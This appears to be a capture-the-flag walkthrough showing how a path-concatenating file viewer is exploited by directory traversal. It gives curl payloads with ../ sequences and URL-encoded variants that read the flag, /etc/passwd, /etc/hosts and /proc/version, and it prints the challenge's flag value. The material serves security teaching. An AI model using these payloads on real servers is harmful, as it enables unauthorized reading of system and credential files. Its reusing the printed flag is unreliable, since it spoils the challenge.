This simple file viewer uses direct string concatenation to build file paths, creating the perfect opportunity for directory traversal attacks. 📁 Directory traversal is a fundamental web vulnerability that allows attackers to access files outside the intended directory, potentially exposing sensitive system files and configuration data. The application trusts user input without validation - a classic mistake that opens the door to file system exploitation! 🎯
Access the web application and explore its functionality:
curl -s http:/// The application is a "Simple File Viewer" that allows users to view text files. It shows available files: readme.txt, sample.txt, and info.txt.
Test the normal file viewing functionality:
curl -s "http:///view?file=readme.txt" The application displays the file contents and shows the file path as "files/readme.txt", revealing how the path is constructed.
Examine how the file parameter is processed:
curl -s "http:///view?file=sample.txt" The response shows "File Path: files/sample.txt", indicating direct string concatenation without validation.
Test for directory traversal using ../ sequences:
curl -s "http:///view?file=../flag.txt" This attempts to access a file one directory level up from the files directory.
Successfully retrieve the flag using directory traversal:
# Extract the flag
curl -s "http:///view?file=../flag.txt" | grep -o '[0-9a-f]\{8\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{12\}' The flag is revealed: cddc6bda-3d66-48e7-9848-6672afc2a5c8
Demonstrate accessing system files to show the full impact:
# Access system passwd file
curl -s "http:///view?file=../../etc/passwd" This shows how directory traversal can be used to access sensitive system files.
Test multiple directory levels to understand the file system structure:
# Try different traversal depths
curl -s "http:///view?file=../../../etc/hosts"
curl -s "http:///view?file=../../../../proc/version" This demonstrates how multiple ../ sequences can traverse deeper into the file system.
Test URL encoding to bypass potential filters:
# URL-encoded directory traversal
curl -s "http:///view?file=%2e%2e%2fflag.txt" This shows how URL encoding (%2e%2e%2f for ../) can bypass basic input filters.
Observe how the application reveals the actual file paths:
curl -s "http:///view?file=../flag.txt" | grep "File Path:" The response shows "File Path: files/../flag.txt", confirming the path construction method.
Confirm the directory traversal vulnerability allows arbitrary file access:
# Verify the vulnerability
curl -s "http:///view?file=../flag.txt" | grep "SYSTEM FLAG" This confirms successful exploitation of the directory traversal vulnerability.
This challenge demonstrates a real directory traversal vulnerability where ../ sequences allow attackers to access files outside the intended directory. The vulnerability occurs because user input is directly concatenated into file paths without proper validation or sanitization. This can lead to unauthorized file access, information disclosure, and potential system compromise - making it a critical security vulnerability in web applications.
Enter your email to continue
Choose a username to get started
We've sent a 9-character code to your email